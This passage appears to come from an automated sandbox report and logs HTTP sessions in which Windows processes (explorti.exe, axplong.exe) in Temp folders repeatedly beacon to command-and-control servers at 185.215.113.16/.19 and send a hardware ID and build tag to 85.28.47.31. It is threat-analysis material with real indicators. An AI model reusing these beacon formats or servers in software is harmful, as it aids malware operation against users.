48	192.168.2.5	61285	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:35.519866943 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:36.284329891 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:36.295352936 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:36.545320988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	61286	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:36.006166935 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:36.743279934 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:36.813093901 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:37.060408115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	61287	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:36.937608957 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:37.662587881 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:37.663760900 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:37.917380095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	61288	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:37.264238119 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:38.082894087 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:38.083911896 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:38.338052988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	61290	85.28.47.31	80

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:37.558734894 CEST	86	OUT	GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 17:57:38.240582943 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:57:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:57:38.254326105 CEST	409	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAK Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="build"sila------CFIEGDAEHIEHIDHJDAAK--
Jul 26, 2024 17:57:38.438590050 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:57:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	61291	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:38.036052942 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:38.788717031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:38.808662891 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:39.078953981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	61292	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:38.508569002 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:39.261997938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:39.368230104 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:39.620089054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	61294	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:39.378122091 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:40.136193037 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:40.140808105 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:40.395818949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	61297	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:39.752059937 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:40.522326946 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:40.527231932 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:40.775208950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	61298	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:40.532316923 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:41.294182062 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:41.295182943 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:41.540065050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	61300	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:40.905375004 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:41.723614931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:41.753392935 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:42.002592087 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	61301	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:41.832281113 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:42.579854965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:42.592155933 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:42.838845968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.5	61303	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:42.113221884 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:42.879806995 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
